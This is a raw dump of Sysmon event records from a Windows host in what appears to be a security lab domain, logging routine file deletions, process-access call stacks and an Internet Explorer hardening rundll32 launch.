12:02:22.786{266CAFBE-64C5-6064-A500-00000000AE01}4356ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Libraries\Videos.library-ms~RF1a459.TMPMD5=9DC90CD214819F93B5B21480AF2C0FF4,SHA256=955976205E43F7483B29C5D59F1C5DEB888729E24BCCAC9FB641CD60FE5B0551,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005807Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:22.739{266CAFBE-64C5-6064-A500-00000000AE01}4356ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Libraries\Pictures.library-ms~RF1a42a.TMPMD5=CE4EA1958BD7A54E6FFE7BD3A599A642,SHA256=6672E28A3AD07202118B42BBAC559D6A65AF8B3829B7AEB2F18B3EB70027DEFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005806Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:22.693{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54DA8CF51AF32EE25FD54847F40703FB,SHA256=488F5A5478A32CD820B200DF46E276DADA496632F1EC53C59D3C598C4509749A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005805Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:22.630{266CAFBE-64C5-6064-A500-00000000AE01}4356ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Libraries\Documents.library-ms~RF1a3bd.TMPMD5=595763DFD2DAB977091A843EBCF1164F,SHA256=C7A2B95661E15C18F8407CD81FBDE33356781C26DF3C60ED914AC534D35CEF8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005804Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:22.584{266CAFBE-64C5-6064-A500-00000000AE01}4356ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Libraries\Videos.library-ms~RF1a38e.TMPMD5=DADFF5A5756573645ADC5785A8099647,SHA256=CCF4C19E821EBC9A362A58A3B6CCC2B03674297D1777C6036A83EDF672C16A11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005803Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:22.537{266CAFBE-64C5-6064-A500-00000000AE01}4356ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Libraries\Music.library-ms~RF1a35f.TMPMD5=D252F6F15CAEDF365FE2BA1989DBE20F,SHA256=82FB3B41C3D72F27391B1D27B42C99932F26CF5C6E817B65AF5AAD293BC24ACB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005802Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:22.023{266CAFBE-646C-6064-1000-00000000AE01}11242252C:\Windows\system32\svchost.exe{266CAFBE-64CD-6064-B200-00000000AE01}1260C:\Windows\System32\unregmp2.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005801Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:22.023{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64CD-6064-B200-00000000AE01}1260C:\Windows\System32\unregmp2.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005846Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.954{266CAFBE-64CF-6064-B300-00000000AE01}5164ATTACKRANGE\AdministratorC:\Windows\System32\rundll32.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGIA8DE.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005845Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.938{266CAFBE-64CF-6064-B300-00000000AE01}5164ATTACKRANGE\AdministratorC:\Windows\System32\rundll32.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGIA6E9.tmpMD5=3006752A2BCFEDA0F75D551EA656B2EF,SHA256=DFD64231860C732DCED3DC78627A7844A08D5D3E4CD253FD81186BAE33CC368A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005844Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.783{266CAFBE-64C5-6064-A500-00000000AE01}4356ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000012.dbMD5=A7F8296CDC5152AB7651B283020EEE4F,SHA256=8A553E97AE3298F7478DF69DF7F5AB092CA144143ED387C935A84306F41DBCFF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005843Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:23.565{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005842Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:23.534{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005841Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:23.534{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 23542300x80000000000000005840Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.440{266CAFBE-64CF-6064-B300-00000000AE01}5164ATTACKRANGE\AdministratorC:\Windows\System32\rundll32.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGIA6E9.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005839Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:23.440{266CAFBE-646C-6064-1000-00000000AE01}11242252C:\Windows\system32\svchost.exe{266CAFBE-64CF-6064-B300-00000000AE01}5164C:\Windows\System32\rundll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005838Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.440{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64CF-6064-B300-00000000AE01}5164C:\Windows\System32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005837Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:23.425{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005836Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.425{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005835Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:23.409{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005834Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.409{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005833Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:23.409{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-64CF-6064-B300-00000000AE01}5164C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005832Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.409{266CAFBE-64C5-6064-A500-00000000AE01}43561176C:\Windows\Explorer.EXE{266CAFBE-64CF-6064-B300-00000000AE01}5164C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+99121|C:\Windows\System32\SHELL32.dll+97f86|C:\Windows\System32\SHELL32.dll+d6c91|C:\Windows\System32\SHELL32.dll+bcebe|C:\Windows\System32\SHELL32.dll+551d34|C:\Windows\System32\SHELL32.dll+551790|C:\Windows\System32\SHELL32.dll+551904|C:\Windows\System32\SHELL32.dll+22dcef|C:\Windows\System32\SHELL32.dll+f539d|C:\Windows\System32\SHELL32.dll+10d421 154100x80000000000000005831Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.423{266CAFBE-64CF-6064-B300-00000000AE01}5164C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXE"C:\Windows\System32\rundll32.exe" 
"C:\Windows\System32\iesetup.dll",IEHardenAdminC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 10341000x80000000000000005830Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.284{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005829Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:23.269{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005828Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:23.269{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005827Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:23.253{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005826Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:23.253{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 11241100x80000000000000005825Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.191{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXEC:\Users\Administrator\Links\Downloads.lnk2021-03-31 10:51:16.250 23542300x80000000000000005824Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.191{266CAFBE-64C5-6064-A500-00000000AE01}4356ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\Links\Downloads.lnkMD5=859920D477EE7ED0174243DFF586E5E3,SHA256=1F8B2760E210762D02665D55224973A3EE73E43B7E0F5398AF35E86861B7CB50,IMPHASH=00000000000000000000000000000000falsetrue 
